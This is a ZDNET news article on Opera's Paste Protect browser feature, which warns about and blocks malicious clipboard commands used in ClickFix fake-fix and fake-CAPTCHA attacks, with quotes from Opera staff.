Follow ZDNET: Add us as a preferred source on Google.
ZDNET's key takeaways
Opera has released a new protection feature.
Paste Protect can help prevent ClickFix attacks.
The feature is free and enabled by default.
When a website tells you to "copy this command to fix the issue," you may not know it, but the command in question could be malicious. These are called ClickFix attacks, as my ZDNET colleague Charlie Osborne explains.
This social engineering technique can be adapted to various access scenarios, but in general, ClickFix aims to take advantage of human problem-solving. Fake error messages, for example, could request users to fix a minor technical problem by copying and pasting code or launching commands on their system.
Also: This new cyberattack tricks you into hacking yourself. Here's how to spot it
To solve that problem, the developers at Opera have created Paste Protect, which detects and blocks malicious clipboard content before you can paste it into a terminal or command prompt. According to Opera, "A ClickFix attack usually starts with something small and ordinary...a video that won't play, or a CAPTCHA that won't quite verify you're human. Next, the page offers a fix for the problem by way of a short command to be pasted into the computer's terminal. Once that command is run, the computer is compromised."
According to Opera, over half of malware-loading cyber attacks in 2025 were of the ClickFix type. In fact, fake CAPTCHA attacks spiked by 563% last year.
Why ClickFix attacks dodge most defenses
ClickFix attacks sidestep nearly all existing defenses, including antivirus and email filters. The reason: Those systems are designed to check for threats from external sources, not for commands typed or pasted by the user.
"ClickFix attacks succeed because they turn the user into the weapon," said Pawel Kurzelewski, head of security at Opera. "The clipboard is the last point before a malicious command is run, so that's where we built our defense. With Paste Protect, we're stopping these attacks at the exact moment they would normally succeed."
You might recall that back in 2021, Opera released a feature of the same name. I reached out to Varsha Chowdhury (who does PR for Opera), and she had this to say:
The earlier Paste Protection feature prevented external applications from hijacking something you'd already copied and silently replacing it with something harmful, such as a malicious URL, bank account number, or crypto wallet address.
Paste Protect builds on that existing protection by adding a new Injection Protection layer. This detects and blocks malicious commands that are copied from a website—or otherwise injected into your clipboard—before they're pasted into Terminal or Command Prompt. That's the new capability designed to protect against ClickFix-style attacks.
So, in short:
Paste Protection = protects against clipboard hijacking by external applications.
Paste Protect = includes the existing Paste Protection plus the new Injection Protection, giving users protection against both clipboard hijacking and ClickFix-style clipboard injection attacks.
Opera's new feature monitors clipboard activity in real time for malicious commands that are either copied by the user or placed in the clipboard by a website. The detection technique used by Opera is tailored for Linux, MacOS, and Windows to spot specific patterns associated with known malicious scripts. If one is detected, a warning pops up, explaining to the user what happened, along with a red icon in the address bar. Users will only be able to see the first 120 characters of the blocked content.
Also: Fake CAPTCHA attacks spiked by 563% last year: How to spot them before it's too late
With this new feature, Opera is being proactive against one of the fastest-rising threats to users. Although extensions can help prevent such attacks, Opera is the first browser to have the functionality built in. This unified clipboard safety system is activated by default and allows users to whitelist trusted websites.
Even with Paste Protect enabled and active, you should always be wary of copying and pasting commands into your computer's terminal -- unless you trust the source explicitly.
View original source — ZDNet ↗


